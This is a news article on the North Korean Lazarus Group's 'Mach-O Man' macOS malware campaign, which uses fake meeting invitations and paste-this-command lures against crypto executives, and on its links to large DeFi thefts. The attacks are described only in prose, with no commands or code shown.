North Korean hackers, known as the Lazarus Group, are employing a macOS virus called “Mach-O Man” and deceptive meeting invitations to gain access to the accounts of cryptocurrency leaders. They then use this access to steal large sums of money – worth nine figures – from DeFi platforms.

Summary

CertiK, a blockchain security company, reports that Lazarus, a hacking group believed to be supported by North Korea, is now targeting executives in the finance and cryptocurrency industries with new malware for macOS. This operation, called “Mach-O Man,” uses deceptive tactics and advanced techniques to steal cryptocurrency and confidential company information, while carefully concealing its presence on computers.

CertiK researchers have identified a campaign that tricks people into copying and pasting harmful commands into their Mac computers. Attackers disguise these commands as legitimate “repair” or “verification” instructions, often delivered through fake online meeting invitations. The commands are executed in the macOS Terminal, and the malicious software is designed to erase itself afterward, making it harder to investigate.

How the “Mach-O Man” toolkit works

Security firm SOC Prime has linked a hacking framework called “Mach-O Man” to the Lazarus Group, specifically its Famous Chollima unit. Hackers are spreading it by hijacking Telegram accounts and sending deceptive meeting invitations to companies in the crypto and finance industries. According to CoinDesk, the toolkit uses several Mach-O files to gather information about a system, maintain access, and steal usernames, passwords, and browser data – all while being controlled through Telegram.

Mandiant, a Google Cloud company, has reported on recent attacks targeting macOS users. These attacks combine a technique called ClickFix with realistic, AI-generated deepfake videos, fake Zoom meetings, and compromised messaging accounts. The goal is to trick people into running hidden commands on their computers, ultimately leading to a macOS infection. According to Mandiant researchers, a recent attack used a hacked Telegram account, a fraudulent Zoom call, and AI-powered deception to convince victims to execute these harmful commands.

DeFi raids fund broader operations

A recent surge of attacks, dubbed “Mach-O Man,” is connected to a larger operation by the Lazarus Group, which has stolen over $500 million from the DeFi platforms Drift and KelpDAO in a little over two weeks. These attacks involved tricking employees at a trading firm and exploiting vulnerabilities across different blockchains to create (or ‘mint’) approximately 116,500 rsETH and steal around $292 million worth of assets.

LayerZero, the technology KelpDAO relies on to connect different blockchains, believes the recent rsETH hack was likely carried out by North Korea’s Lazarus Group. They explained that a flaw in how their system was designed – specifically, a single point of failure in verifying messages – allowed the hackers to send a fake message between blockchains.

According to SecurityWeek, the hacking group Lazarus has been stealing cryptocurrency for years, taking around $2 billion in virtual assets just in 2023 and 2024. Their activity builds on previous campaigns identified by ClickFix.

After a record-breaking month for hacking in the DeFi space, the market now seems to anticipate at least another $100 million will be stolen this year. This highlights how attacks from groups like Lazarus, potentially backed by nation-states, are now a regular and significant threat to the crypto world.

Read More

• ETH PREDICTION. ETH cryptocurrency
• Gold Rate Forecast
• USD TRY PREDICTION
• Warning: Binance-Listed Siren Token Rallies 30X—Here’s Why You Should Stay Away
• USD INR PREDICTION
• Altcoins About to Explode? You Won’t Believe What’s Next for These 4 in May 2025 🚀
• EUR INR PREDICTION
• Brent Oil Forecast
• Bitcoin’s Rally: The Unlikely Hero of the Financial World! 🚀💰
• Bitcoin’s Breakout Moment: Bulls vs. Bears in Final Showdown!

2026-04-22 15:54